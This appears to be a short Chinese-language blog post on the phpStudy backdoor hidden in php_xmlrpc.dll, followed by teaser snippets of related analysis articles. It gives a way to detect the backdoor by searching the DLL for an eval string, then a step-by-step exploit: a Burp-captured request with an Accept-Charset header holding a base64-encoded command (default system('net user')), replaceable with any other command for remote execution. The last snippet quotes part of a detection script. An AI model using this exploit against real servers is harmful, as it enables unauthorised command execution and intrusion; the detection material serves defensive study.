1.影響版本分布:
2.直觀感性驗證:
用記事本或者notepad++開啟phpstudy安裝目錄下的:
phptutorial\php\php-5.4.45\ext\php_xmlrpc.dll
存在@eval(%s('%s'));即說明有後門。
3.客觀理性驗證:
bp抓包復現 》 直接訪問首頁抓包
在請求頭里構造 accept-encoding 和 accept-charset
然後在請求頭里新增 accept-charset: c3lzd**tkcduzxqgdxnlcicpow==
accept-charset 的值就是執行的命令,預設是system('net user');
如果想要執行其他命令,直接去把命令進行base64編碼替換即可!
post請求方式響應更直觀:在請求頭最後,製造若干空行。
參考:
phpstudy後門簡單分析
感謝pcat師傅的文章 20號得知phphstudy有後門,不知道官網的是不是也被入侵了,當時沒有進行檢視,由於當時正在秋招面試比較忙,鴿了幾天有了下文 被中馬的為php xmlrpc.dll這個dll檔案,這個可以通過查詢洩露字串很容易通過指令碼實現,就不貼了,可以以eval為關鍵字來進行搜尋 p...
使用Ghidra分析phpStudy後門
主要工具 kali linux ghidra 9.0.4 010editor 9.0.2 樣本環境 windows7 phpstudy 20180211 先在 windows 7 虛擬機器中安裝 phpstudy 20180211,然後把安裝完後的目錄拷貝到 kali linux 中。根據網上公開的...
phpstudy後門檔案檢測及利用
bin bash author pcat chamd5.org trojan feature trojan eval function check dir x dll x then strings f2 grep q trojan if 0 then echo f2 strings f2 grep ...